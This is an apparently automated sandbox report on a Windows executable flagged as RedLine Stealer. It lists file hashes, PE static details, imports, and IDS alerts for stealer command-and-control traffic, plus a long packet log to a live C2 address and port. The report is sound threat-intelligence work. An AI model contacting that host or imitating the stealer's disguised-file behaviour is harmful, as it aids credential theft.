
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\GoogleUpdate.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\chrome.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	154456
Entropy (8bit):	5.948865342404173
Encrypted:	false
SSDEEP:	3072:UAt2Sb2m5oyiTOZQvfSERdX9Zk8ACB+6l4nfS3wjVSzpD2MhkNJoSloS+Zh52ruK:fxwjRjB+O+/H
MD5:	9A66A3DE2589F7108426AF37AB7F6B41
SHA1:	12950D906FF703F3A1E0BD973FCA2B433E5AB207
SHA-256:	A913415626433D5D0F07D3EC4084A67FF6F5138C3C3F64E36DD0C1AE4C423C65
SHA-512:	A4E81BFFBFA4D3987A8C10CEC5673FD0C8AECBB96104253731BFCAB645090E631786FF7BDE78607CBB2D242EE62051D41658059FCBBC4990C40DBB0FEC66FCD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....cg.}....ce......cd.o......f......e......^....cy.z...w...........v.....i.v...w...M.......v...Richw...........................PE..L.....u`............................Bt.......0....@..........................`......g.....@.................................LQ..x....`..P............&..X5...P.......[..T............................[..@............P..H............................text...T........................... ..`.data........0......."..............@....idata.......P.......*..............@..@.rsrc...P....`.......4..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.020343385131205
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6iWK0k820U.exe
File size:	248320
MD5:	314e1e071f0664e0a39093313b394633
SHA1:	bfa37bd268633c93d49736e5e967cd56d7d0c815
SHA256:	fc45095af85b3699290055b3bf12cdeba82dbb6c70187351df253a735695f4bf
SHA512:	4b74defa39e660cc85e0fa20a6aa75ff76cb3bd3d7bc2fff972fabf26567a87c6582c7676bc5a476a7210e4026e763ce5ea03fe03d016cda9e7ebc60f124669e
SSDEEP:	6144:iKai5uCUAe4dUMvMzVWMNQErpV2IviDnye3s9TCb:zaik9AeaUMvMzVWMNQErpV2IvQyp9TC
TLSH:	55347B127980B439F6ADCBFAD8DD5E49497F63E2178026CB115D0B4807A13FF9EA434A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}....................................Q.......................................Rich....................PE..L.....xc...........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40af50
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6378EA1E [Sat Nov 19 14:37:18 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	19f81fe756f31ae8a7d11110e6e81c7a

Entrypoint Preview

Instruction
call 00007F2E9CDF0E5Ch
jmp 00007F2E9CDECF99h
cmp ecx, dword ptr [0043D2BCh]
jne 00007F2E9CDED0F4h
rep ret
jmp 00007F2E9CDF0EDEh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0043D2BCh]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0043D2BCh]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F2E9CDED155h
call 00007F2E9CDEED00h
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [0043DB78h]
je 00007F2E9CDED104h
mov ecx, dword ptr [00000000h]

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a0d4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3f000	0x628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1411f	0x14200	False	0.49850786102484473	data	6.697043159536046	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x482e	0x4a00	False	0.5372149493243243	data	6.0920006583803845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x23e38	0x23200	False	0.5357192504448398	data	6.68842919251333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3f000	0x628	0x800	False	0.35791015625	data	3.2803316145386052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x3f200	0x428	data	English	United States
RT_MANIFEST	0x3f0a0	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

Sleep, GetProcAddress, GetModuleHandleA, MultiByteToWideChar, FreeConsole, SetPriorityClass, GetFileSizeEx, ExitThread, InitializeCriticalSection, CreateMutexW, AddAtomW, GetProcessId, ConvertThreadToFiber, CheckNameLegalDOS8Dot3W, GetFileSize, AssignProcessToJobObject, CreateFileW, GetCurrentThread, WriteConsoleOutputCharacterW, GetFileInformationByHandle, SetProcessAffinityMask, FindVolumeClose, GetNumaNodeProcessorMask, SetFilePointer, RtlUnwind, RaiseException, GetCommandLineA, GetLastError, HeapFree, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.337.220.87.249707279242850286 11/24/22-12:19:58.824353	TCP	2850286	ETPRO TROJAN Redline Stealer TCP CnC Activity	49707	27924	192.168.2.3	37.220.87.2
192.168.2.3172.66.43.60497124432039616 11/24/22-12:20:44.878792	TCP	2039616	ET TROJAN Win32/Agent.AETZ CnC Checkin	49712	443	192.168.2.3	172.66.43.60
192.168.2.337.220.87.249707279242850027 11/24/22-12:19:38.494390	TCP	2850027	ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init	49707	27924	192.168.2.3	37.220.87.2
37.220.87.2192.168.2.327924497072850353 11/24/22-12:19:40.518961	TCP	2850353	ETPRO MALWARE Redline Stealer TCP CnC - Id1Response	27924	49707	37.220.87.2	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 12:19:37.433577061 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:37.463315964 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:37.463525057 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:38.494390011 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:38.524030924 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:38.542242050 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:38.693612099 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:40.470938921 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:40.500436068 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:40.518960953 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:40.693469048 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:50.155196905 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:50.184797049 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:50.204971075 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:50.205002069 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:50.205022097 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:50.205049038 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:50.205137014 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:50.205190897 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:52.292512894 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:52.341334105 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:52.382024050 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.133924961 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.163841963 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.163878918 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.163892984 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.164118052 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.193748951 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.193780899 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.193797112 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.193876028 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.193972111 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.194000006 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.194041967 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.194067001 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.223587990 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223619938 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223640919 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223675966 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223691940 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223712921 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223732948 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223790884 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.223799944 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223886967 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223897934 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.223908901 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223923922 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.223953962 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.223995924 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.224008083 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.224035978 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.224323988 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.253470898 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253694057 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253711939 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253726006 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253740072 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253772020 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253870010 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253884077 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253896952 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253906965 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.253911018 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253968000 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253983021 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.253988981 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.254031897 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.254031897 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.254061937 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254076004 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254092932 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254184008 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254198074 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254800081 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254817009 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254829884 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254910946 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254926920 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254940033 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254980087 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.254996061 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.255433083 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.255553961 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.284296989 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284329891 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284343958 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284359932 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284373045 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284387112 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284399986 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284413099 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284425020 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284437895 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.284991026 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.285084963 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.285459995 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285478115 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285494089 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285510063 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285523891 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285537004 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285595894 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285609007 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285665035 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285679102 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285691977 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285784006 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285820007 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285877943 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.285994053 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.286010027 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.286024094 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.286484003 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.286561012 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.314629078 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314660072 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314752102 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314785004 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314842939 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314858913 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314872980 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314953089 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314968109 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314980984 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.314994097 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315073013 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315088987 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315188885 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315248966 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315392971 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315408945 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315433979 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315562010 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315577984 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315845013 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315862894 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315876961 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.315890074 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316030025 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316070080 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316102982 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316193104 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316207886 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316271067 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316304922 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316359997 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316423893 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316468954 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316553116 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316709042 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316747904 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.316761971 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.317131042 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.317150116 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.317183971 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.321031094 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.321214914 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.321214914 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.321305990 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.321362972 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.350764990 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.350794077 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.350815058 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.350904942 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.350927114 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.350980997 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351001024 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351155043 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351178885 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351258993 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351299047 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351319075 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351464033 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351484060 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351655006 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351761103 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351826906 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351928949 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.351963997 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352113962 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352134943 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352154970 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352293015 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352345943 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352407932 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352498055 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352519035 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352667093 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352688074 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352734089 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352772951 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.352838039 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.352863073 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.352951050 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353005886 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353117943 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353199005 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353219032 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353239059 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353436947 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353460073 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353480101 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353529930 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353550911 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.353750944 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382358074 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382395983 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382416010 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382800102 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382854939 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.382935047 CET	27924	49707	37.220.87.2	192.168.2.3
